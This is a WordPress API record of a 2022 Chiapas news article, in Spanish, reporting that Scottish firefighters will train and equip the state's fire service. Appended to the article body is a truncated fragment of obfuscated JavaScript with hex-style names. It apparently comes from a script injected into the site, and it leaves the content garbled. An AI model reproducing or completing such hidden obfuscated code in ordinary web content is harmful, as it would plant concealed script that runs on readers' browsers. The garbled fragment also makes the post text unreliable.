{"id":3038,"date":"2022-06-20T00:59:46","date_gmt":"2022-06-20T00:59:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3038"},"modified":"2022-06-20T00:59:47","modified_gmt":"2022-06-20T00:59:47","slug":"bomberos-de-escocia-capacitaran-a-bomberos-chiapanecos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3038","title":{"rendered":"Bomberos de Escocia capacitar\u00e1n a Bomberos chiapanecos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-5.15.56-PM.jpeg\" alt=\"\" class=\"wp-image-3039\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-5.15.56-PM.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-5.15.56-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-5.15.56-PM-768x576.jpeg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>\u00d3scar G\u00f3mez<\/strong><\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Marco Antonio S\u00e1nchez Guerrero, Director General del Instituto de Bomberos del Estado de Chiapas, dio a conocer que del 13 al 22 de agosto del presente a\u00f1o se realizar\u00e1 el Encuentro Internacional para capacitar al personal de esta instituci\u00f3n, en el marco del D\u00eda del Bombero y la Bombera que se celebra en M\u00e9xico cada 22 de agosto.<\/p>\n\n\n\n<p>En entrevista, dijo que&nbsp;el principal objetivo de este evento es capacitar al personal en los protocolos de actuaci\u00f3n de cualquier emergencia, formaci\u00f3n que se llevar\u00e1 a cabo en su primera semana en la Ciudad de M\u00e9xico, donde bomberos provenientes de Escocida, quienes brindar\u00e1n ponencias para trabajadores de todos los estados del pa\u00eds, a fin de unificar los criterios para mejorar la atenci\u00f3n a la ciudadan\u00eda.<\/p>\n\n\n\n<p><br>Adelant\u00f3 que del 17 al 22 de agosto en la ciudad de Tuxtla Guti\u00e9rrez se espera que bomberos y bomberas reciban la capacitaci\u00f3n adecuada para atender las emergencias, as\u00ed como la recepci\u00f3n de la donaci\u00f3n de un contenedor con diversos art\u00edculos y maquinaria para equipar a las y los bomberos de Chiapas.<\/p>\n\n\n\n<p><br>S\u00e1nchez Guerrero indic\u00f3 que ser\u00e1n cuatro instructores escoceses que visitar\u00e1n tierras chiapanecas en los pr\u00f3ximos meses para contribuir en la formaci\u00f3n de los elementos de esta instituci\u00f3n.<\/p>\n\n\n\n<p>destac\u00f3 que en este marco, firmar\u00e1n un convenio de colaboraci\u00f3n con la International Fire and Rescue Association (IFRA, por sus siglas en ingl\u00e9s) de Escocia, para realizar estas capacitaciones de manera constante y gestionar m\u00e1s donaciones con las que puedan ir equipando las diferentes estaciones con las que se cuenta en la entidad.<\/p>\n\n\n\n<p><br>\u201cLa intenci\u00f3n es mantener esta relaci\u00f3n bilateral entre el gobierno de M\u00e9xico y el gobierno de Escocia, el v\u00ednculo son los bomberos\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Marco Antonio S\u00e1nchez Guerrero, Director General del Instituto de Bomberos del Estado de Chiapas, dio a conocer que del 13 al 22 de agosto del presente a\u00f1o se realizar\u00e1 el Encuentro Internacional para capacitar al personal de esta instituci\u00f3n, en el marco del D\u00eda del Bombero y la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3039,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3038","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3038","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3038"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3038\/revisions"}],"predecessor-version":[{"id":3040,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3038\/revisions\/3040"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3039"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3038"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3038"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3038"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}